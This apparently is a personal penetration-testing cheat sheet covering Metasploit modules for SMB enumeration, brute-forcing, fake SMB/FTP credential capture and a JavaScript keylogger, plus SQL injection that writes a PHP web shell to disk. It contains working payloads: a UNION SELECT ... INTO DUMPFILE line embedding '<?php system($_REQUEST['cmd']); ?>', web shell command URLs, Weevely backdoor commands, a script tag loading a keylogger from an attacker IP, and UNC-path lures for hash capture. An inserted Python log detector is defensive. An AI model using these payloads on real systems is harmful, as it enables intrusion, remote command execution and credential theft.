moved permanently to http://z-eagle.blogspot.com/
auxiliary/scanner/vmware/vmauthd_login
This module will test vmauthd logins on a range of machines and report successful logins.
SQLi to Backdoor
SELECT 'somecode' INTO DUMPFILE [path to file];
http://dev.mysql.com/doc/refman/5.1/en/select-into.html
This statement writes a string (in our case, code) to a file on the database server.
used scripts:
' union select null,"<h1>pawned</h1> <?php system($_REQUEST['cmd']); ?>" INTO DUMPFILE 'c:\xampp\htdocs\dvwa\test.php' #
or
' union select null," <h1>pawned</h1> <?php system($_REQUEST['cmd']); ?> " INTO DUMPFILE '..\..\htdocs\dvwa\test.php' #
[to execute a command: access the url: http://server ip/uri/backdoor.php?cmd=somecommand]
[http://192.168.0.148/dvwa/backdoor.php?cmd=whoami]
or
' union select null,"weevely php script" INTO DUMPFILE 'c:\xampp\htdocs\dvwa\test.php' #
if the 'mysql_real_escape_string' function is used, forget about injecting that code; simply use sqlmap to get the password hash, log in, then execute the code :)
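As an added example (not part of the original notes), a small detector a defender can run over web access logs to flag the UNION ... INTO DUMPFILE write described above and the later use of the dropped shell; the log lines are constructed, and the module path is assumed, not taken from the notes.

```python
import re
from urllib.parse import unquote_plus

# UNION-based injection that writes to the filesystem (SELECT ... INTO DUMPFILE/OUTFILE).
# Matching is done on the URL-decoded request so %20 / + encodings do not hide keywords.
# Structural fix on the server side: prepared statements, a DB account without the FILE
# privilege, and secure_file_priv restricting where MySQL may write.
_FILE_WRITE = re.compile(r"\bunion\b.*\bselect\b.*\binto\s+(dumpfile|outfile)\b", re.I | re.S)
_PHP_TAG = re.compile(r"<\?php|<\?=|\$_(REQUEST|GET|POST)\[", re.I)
_WEBSHELL_CALL = re.compile(r"[?&]cmd=", re.I)

# Apache/nginx combined log format: ip - - [time] "METHOD path HTTP/x" status size
_LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the list of findings for one access-log line (empty if clean or unparseable)."""
    m = _LOG.match(line)
    if not m:
        return []
    # decode twice so double-encoded payloads are also visible
    path = unquote_plus(unquote_plus(m.group("path")))
    findings = []
    if _FILE_WRITE.search(path):
        findings.append("sqli_file_write")
    if _PHP_TAG.search(path):
        findings.append("php_code_in_request")
    # a successful request to ?cmd= after a file write is the shell being used
    if _WEBSHELL_CALL.search(path) and m.group("status") == "200":
        findings.append("possible_webshell_use")
    return findings

def scan(lines):
    """Map line index -> findings for every suspicious line."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}

# Constructed sample log lines (not from the original page)
SAMPLE_LOG = [
    '192.168.0.5 - - [10/Oct/2012:13:55:36 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1043',
    '192.168.0.9 - - [10/Oct/2012:13:56:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+select+null%2C%22%3C%3Fphp+system%28%24_REQUEST%5B%27cmd%27%5D%29%3B+%3F%3E%22+INTO+DUMPFILE+%27c%3A%5Cxampp%5Chtdocs%5Cdvwa%5Ctest.php%27+%23&Submit=Submit HTTP/1.1" 200 1043',
    '192.168.0.9 - - [10/Oct/2012:13:56:30 +0000] "GET /dvwa/test.php?cmd=whoami HTTP/1.1" 200 57',
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LOG).items():
        print(idx, findings)
```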
Weevely
Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks.
Just generate and upload the server-side PHP code to the target web server, then run the Weevely client locally to send shell commands.
[generating backdoor] weevely.py generate <password> <output path>
[starting telnet session] weevely.py <url> <password>
[modules]
https://github.com/epinna/Weevely/wiki/Tutorial
DEMO:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py test /root/test.php
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.45.1/test/test.php test
auxiliary/scanner/smb/smb_lookupsid
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine what local users exist on the system. Knowing which users exist on a system can greatly speed up any further brute-force logon attempts later on.
auxiliary/scanner/smb/smb_enumshares
used to enumerate shared folders on the remote machine, RHOSTS
auxiliary/scanner/smb/smb_enumusers
used to enumerate users on the remote machine, RHOSTS
auxiliary/scanner/smb/smb_enumusers_domain
used to enumerate …
auxiliary/scanner/smb/smb_login
used to brute-force SMB logins;
1- Network and Sharing Center » Advanced sharing settings » "turn off password protected sharing"
it will accept any username » equivalent to "smbclient -L RHOSTS --user=anything"
2- Network and Sharing Center » Advanced sharing settings » "turn on password protected sharing"
it will only accept 'user accounts with the password option activated' on the machine with shared contents » equivalent to "smbclient -L RHOSTS --user=useraccount"
auxiliary/server/capture/smb
This module provides a FAKE SMB service that can be used to capture the challenge-response password hashes of SMB client systems.
Responses sent by this service use by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtCrack or John the Ripper (with the jumbo patch).
To exploit this, the target system must try to authenticate to this module. The easiest way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
SMB: Server Message Block (SMB), also known as Common Internet File System (CIFS), is used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.
http://en.wikipedia.org/wiki/Server_Message_Block
http://oss.sgi.com/LDP/HOWTO/SMB-HOWTO-8.html
to access the fake server and enter the password » smbclient -L <server ip>
to crack the password hash » john JOHNPWFILE
auxiliary/server/capture/http_javascript_keylogger
This module runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique.
To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", the following URL will load this script into the calling site: http://server:port/test/anything.js
[link format] http://attacker ip:SRVPORT/URIPATH/xxxx.js
DEMO
1- the used script:
<script type="text/javascript" src="http://192.168.45.128:8080/H8JxRL3B/test.js">
</script>
2- search for ettercap
http://www.irongeek.com/i.php?page=security/ettercapfilter
To view the demo page use http://ip:8080/demo
auxiliary/server/capture/ftp
This module provides a fake FTP service that is designed to capture authentication credentials.